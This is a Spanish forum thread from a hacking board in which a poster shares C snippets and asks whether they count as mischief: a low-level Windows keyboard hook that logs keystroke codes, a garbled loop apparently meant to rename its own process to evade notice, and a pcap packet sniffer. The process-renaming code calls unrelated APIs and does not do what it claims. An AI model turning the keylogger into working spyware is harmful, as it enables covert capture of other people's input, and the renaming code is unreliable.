elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  ¿Maldades con la Win API de C?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ¿Maldades con la Win API de C?  (Leído 1,245 veces)
Parado_larga_duracion_ESP

Desconectado Desconectado

Mensajes: 49


Ver Perfil
¿Maldades con la Win API de C?
« en: 23 Febrero 2024, 11:21 am »

¿Esto es un keylogger a bajo nivel?

Código
  1. #include <windows.h>
  2. #include <stdio.h>
  3.  
  4. LRESULT CALLBACK KeyboardProc(int nCode, WPARAM wParam, LPARAM lParam) {
  5.    if (nCode >= 0) {
  6.        if (wParam == WM_KEYDOWN || wParam == WM_SYSKEYDOWN) {
  7.            KBDLLHOOKSTRUCT *pKey = (KBDLLHOOKSTRUCT *)lParam;
  8.            printf("Tecla pulsada: %d\n", pKey->vkCode);
  9.        }
  10.    }
  11.  
  12.    return CallNextHookEx(NULL, nCode, wParam, lParam);
  13. }
  14.  
  15. int main() {
  16.    // Instalar el gancho de teclado
  17.    HHOOK hook = SetWindowsHookEx(WH_KEYBOARD_LL, KeyboardProc, NULL, 0);
  18.    if (hook == NULL) {
  19.        printf("Error al instalar el gancho de teclado.\n");
  20.        return 1;
  21.    }
  22.  
  23.    // Mantener el programa en ejecución
  24.    MSG msg;
  25.    while (GetMessage(&msg, NULL, 0, 0) > 0) {
  26.        TranslateMessage(&msg);
  27.        DispatchMessage(&msg);
  28.    }
  29.  
  30.    // Desinstalar el gancho de teclado antes de salir
  31.    UnhookWindowsHookEx(hook);
  32.  
  33.    return 0;
  34. }
  35.  

¿Y esto, es un proceso de nombre travieso?

Código
  1. #include <windows.h>
  2. #include <stdio.h>
  3. #include <string.h>
  4. #include <time.h>
  5.  
  6. int main() {
  7.    srand(time(NULL)); // Inicializar la semilla para generar nombres aleatorios
  8.  
  9.    while (1) {
  10.        // Generar un nuevo nombre aleatorio para el proceso
  11.        char nuevo_nombre[256];
  12.        sprintf(nuevo_nombre, "Proceso_%d", rand());
  13.  
  14.        // Obtener el identificador del proceso actual
  15.        DWORD id_proceso = GetCurrentProcessId();
  16.  
  17.        // Obtener el identificador del proceso
  18.        HANDLE h_proceso = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_SET_INFORMATION, FALSE, id_proceso);
  19.  
  20.        if (h_proceso != NULL) {
  21.            // Cambiar el nombre del proceso
  22.            if (!SetProcessDEPPolicy(0)) {
  23.                printf("Error al cambiar el nombre del proceso. Código de error: %d\n", GetLastError());
  24.                return 1;
  25.            }
  26.  
  27.            // Restaurar el nombre del proceso utilizando un método de bajo nivel
  28.            HMODULE kernel32 = GetModuleHandleA("kernel32.dll");
  29.            if (kernel32 != NULL) {
  30.                FARPROC proc = GetProcAddress(kernel32, "SetProcessInformation");
  31.                if (proc != NULL) {
  32.                    ((BOOL(WINAPI *)(HANDLE, DWORD, PVOID, DWORD))proc)(h_proceso, 0x1d, nuevo_nombre, strlen(nuevo_nombre) + 1);
  33.                }
  34.            }
  35.  
  36.            // Cerrar el handle del proceso
  37.            CloseHandle(h_proceso);
  38.        } else {
  39.            printf("Error al obtener el identificador del proceso. Código de error: %d\n", GetLastError());
  40.            return 1;
  41.        }
  42.  
  43.        // Esperar un segundo antes de cambiar el nombre nuevamente
  44.        Sleep(1000);
  45.    }
  46.  
  47.    return 0;
  48. }
  49.  

No lo sé. ¿Lo son? ¿Qué otras cosas se pueden hacer? Mmmm...

¿Interceptar todo el tráfico?

Código
  1. #include <stdio.h>
  2. #include <pcap.h>
  3.  
  4. void procesar_paquete(u_char *args, const struct pcap_pkthdr *header, const u_char *packet) {
  5.    printf("Paquete capturado, longitud: %d\n", header->len);
  6. }
  7.  
  8. int main() {
  9.    pcap_t *handle;
  10.    char errbuf[PCAP_ERRBUF_SIZE];
  11.  
  12.    // Abrir la interfaz de red para capturar
  13.    handle = pcap_open_live("\\Device\\NPF_{A6D38AA9-CCE1-49B9-BC0C-2B3C79E349E1}", 65536, 1, 1000, errbuf);
  14.    if (handle == NULL) {
  15.        fprintf(stderr, "Error al abrir la interfaz: %s\n", errbuf);
  16.        return 1;
  17.    }
  18.  
  19.    // Compilar y aplicar el filtro (opcional)
  20.    struct bpf_program fp;
  21.    char filter_exp[] = "ip"; // Filtro de ejemplo para capturar paquetes IP
  22.    if (pcap_compile(handle, &fp, filter_exp, 0, PCAP_NETMASK_UNKNOWN) == -1) {
  23.        fprintf(stderr, "Error al compilar el filtro: %s\n", pcap_geterr(handle));
  24.        return 1;
  25.    }
  26.    if (pcap_setfilter(handle, &fp) == -1) {
  27.        fprintf(stderr, "Error al aplicar el filtro: %s\n", pcap_geterr(handle));
  28.        return 1;
  29.    }
  30.  
  31.    // Capturar y procesar paquetes
  32.    pcap_loop(handle, 0, procesar_paquete, NULL);
  33.  
  34.    // Cerrar el manejador de captura
  35.    pcap_close(handle);
  36.  
  37.    return 0;
  38. }
  39.  
  40.  


No sé si funcionarán. ¿Más del estilo?
En línea

malvads

Desconectado Desconectado

Mensajes: 2



Ver Perfil
Re: ¿Maldades con la Win API de C?
« Respuesta #1 en: 6 Mayo 2024, 11:26 am »

¿Cual es el punto de hacerlo a bajo nivel?
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Maldades
Desafíos - Wargames
Camilo1998 1 3,043 Último mensaje 31 Julio 2012, 11:45 am
por Camilo1998
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines